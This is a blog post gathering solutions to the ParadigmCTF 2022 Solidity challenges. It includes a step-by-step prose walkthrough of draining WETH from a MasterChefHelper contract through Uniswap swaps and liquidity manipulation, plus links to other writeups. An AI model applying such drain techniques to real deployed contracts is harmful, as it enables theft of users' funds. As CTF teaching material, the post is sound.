ParadigmCTF 2022 solutions

Solidity

Blockchain

08/22/2022

A CTF(Capture the flag) contest contains a list of challenges in which the participants should try and exploit the system. This blog post contains some interesting solutions proposed by different experts who solved the challenges of the ParadigmCTF 2022. Though there are multiple articles and posts explaining solutions for different problems, I wanted to create an article that serves as a single point of reference for the solutions for the challenges related to Solidity. There were also somechallenges involving Solana (rust) and Starknet (Cairo), whose solutions are not covered in this post. Let's get to it!

Challenge structure:

structure

Each challenge will have the following:

Challenge title
Author name
Tags
Description of the challenge
IP address of the server for that challenge (Access)
Challenge Ticket
Challenge Resources

Once connected to the server, there are three choices:

Launch new instance: Used to deploy a new private blockchain and challenge contracts
Kill instance: Stop any running instances if any
Get flag: Returns the flag for the challenge if solved.

The ticket is like a passcode that we need to submit to execute any of the above three choices.

Each challenge will have the Setup contract deployed when a new instance is launched. The Setup contract will have a method isSolved() which returns a bool. If the challange has been solved the isSolved() method will return true. This method is also used to validation at the server level when we choose the Get flag option.

I have added reference links to some detailed writeups of solutions for some of the challenges as it's more likely to help the readers understand the approach taken by those who actually solved the challenge! All the links are active when this article was written. Please let me know if there are any broken links :)

Challenges:

1. Random:

This is a very basic challenge in which the user can solve the problem by simply calling the solve() method with 4. It is an entry-level challenge!

2. Rescue:

This challange requires the user to drain the WETH tokens from the MasterChefHelper contract. There was also Uniswap's v2 router contract to for adding liquidity and for swapping.

The solution would look like:

Deposit some ETH say 20, in the WETH9 contract to get back WETH tokens.
Use the poolInfo method from the MasterChef contract to get the LP token of any pool. Incase of poolId 1, the LP would be WETH/USDC.
Buy 10 WETH worth of USDC from the UniswapRouterV2 and send it to the MasterChefHelper contract.
Now the MasterChefHelper contract will have 10 WETH and 10 WETH worth of USDC.
Buy 10 WETH worth of USDT from the UniswapRouterV2.
We can now call the solve() method in the Setup contract by passing the poolId as 1, tokenIn as USDT address and the amount as 10.

The MasterChefHelper contract will purchase 5 ETH worth of USDC and 5 ETH worth of WETH and hence now the contract will have 15 ETH worth of tokens on both the sides (WETH and USDC). So the _addLiquidity method will deposit all the tokens into the pool which leaves the MasterChefHelper contract's WETH as zero!

More detailed writeup:

https://github.com/Kaiziron/paradigm-ctf-2022-writeup/blob/main/rescue.md

3. MerkleDrop:

nomad_defi's tweet
Jeiwan's blog has solutions to various challenges!

4. Vanity:

5. Trapdooor:

6. Electric Sheep:

Ventral's post

7. Lockbox:

8. Trapdoooor:

Ventral's post

9. Hint Finance:

10. Just In Time:

Philippe's Blog post

Soooon:

Stealing Sats
Fun Reversing Challenge
SourceCode